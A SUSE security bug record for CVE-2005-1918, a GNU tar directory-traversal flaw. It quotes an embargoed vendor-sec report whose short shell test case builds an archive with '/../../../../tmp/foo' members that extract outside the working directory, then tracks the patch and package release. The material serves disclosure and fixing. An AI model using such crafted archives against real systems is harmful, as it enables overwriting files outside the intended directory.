Bug 145081 (CVE-2005-1918)

Summary: VUL-0: CVE-2005-1918: tar directory traversal
Product: [Novell Products] SUSE Security Incidents Reporter: Ludwig Nussel <lnussel>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P5 - None CC: security-team
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
Whiteboard: CVE-2005-1918: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Found By: Other Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: test archive
tar-dots.patch

Description Ludwig Nussel 2006-01-24 08:23:52 UTC 
We received the following report via vendor-sec.
This issue is not public yet, please keep any information about it inside SUSE.

The described archive doesn't work on 10.0, on SLES8 it does. So tar versions in releases in between may also be vulnerable.

Date: Mon, 23 Jan 2006 14:02:01 -0500
From: Josh Bressers <bressers@redhat.com>
To: vendor-sec@lst.de
Subject: [vendor-sec] Old tar issue

We have recently discovered that when we fixed CVE-2002-0399 in GNU tar, we
added a different similar issue.  Here's a test case if anyone wants to
verify:

$ > a/foo
$ > foo
$ > /../../../tmp/foo

$ tar cvfP test.tar ../foo ./../a/foo /../../../../tmp/foo
../foo
./../a/foo
/../../../../tmp/foo

$ tar -xvf test.tar
../foo
./tar: ../foo: Member name contains `..'
./../a/foo
./tar: ./../a/foo: Member name contains `..'
/../../../../tmp/foo
./tar: /../../../../tmp/foo: Member name contains `..'
./tar: Error exit delayed from previous errors


Note the extraction of /../../../../tmp/foo

This issue is currently embargoed, if it affects anyone else (you used our
patch), we can coordinate a release date.

-- 
    JB
_______________________________________________
Vendor Security mailing list
Vendor Security@lst.de
https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec
Comment 1 Ludwig Nussel 2006-01-24 08:25:26 UTC 
Created attachment 64649 [details]
test archive

extract in some subdirectory of /tmp. if /tmp/foo exists after extraction tar did something wrong.
Comment 2 Klaus Singvogel 2006-02-01 13:20:23 UTC 
mmj is away. will have a closer look at it.
Comment 3 Klaus Singvogel 2006-02-16 16:14:06 UTC 
I'm missing the patch, Josh Bressers speaks of.
Comment 4 Thomas Biege 2006-02-16 17:48:45 UTC 
Do we use his older fix?
Comment 5 Thomas Biege 2006-02-16 17:49:09 UTC 
Nevertheless, I asked for it on vendor-.sec.
Comment 6 Thomas Biege 2006-02-16 18:17:32 UTC 
Created attachment 68895 [details]
tar-dots.patch
Comment 7 Thomas Biege 2006-02-16 18:19:21 UTC 
BTW, Hendrik ist also doing a tar update. bug #151516.
Comment 8 Thomas Biege 2006-02-17 10:48:22 UTC 
CVE-2005-1918
Comment 9 Thomas Biege 2006-02-17 13:17:50 UTC 
Maintenance-Tracker-3586
Comment 10 Thomas Biege 2006-02-22 05:20:45 UTC 
public
Comment 11 Ruediger Oertel 2006-03-01 11:50:38 UTC 
PATCHINFO ? (SWAMPID 3586) (see also #151516
Comment 12 Thomas Biege 2006-03-01 12:07:47 UTC 
AFAICS submission of packages is not finished yet. And due to the fact that not all version have the same bug I would like to wait for the final state from Klaus. Otherwise the wrong patchinfo text may cause confusion.
Comment 13 Klaus Singvogel 2006-03-01 13:51:55 UTC 
current problem is: the given patch doesn't work (code looks even different). need to rework on it.
Comment 14 Klaus Singvogel 2006-03-02 12:39:13 UTC 
fixed packages submitted for: sles8, sles9 (incl. 9.1)
security-team please handle rest of process.
Comment 15 Thomas Biege 2006-03-02 15:25:06 UTC 
/work/src/done/PATCHINFO/tar.patch.maintained.145081
/work/src/done/PATCHINFO/tar.patch.box.145081
Comment 16 Thomas Biege 2006-03-02 15:25:35 UTC 
And thanks Klaus. :)
Comment 17 Thomas Biege 2006-03-06 10:33:54 UTC 
packages approved
Comment 18 Thomas Biege 2009-10-13 20:49:15 UTC 
CVE-2005-1918: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)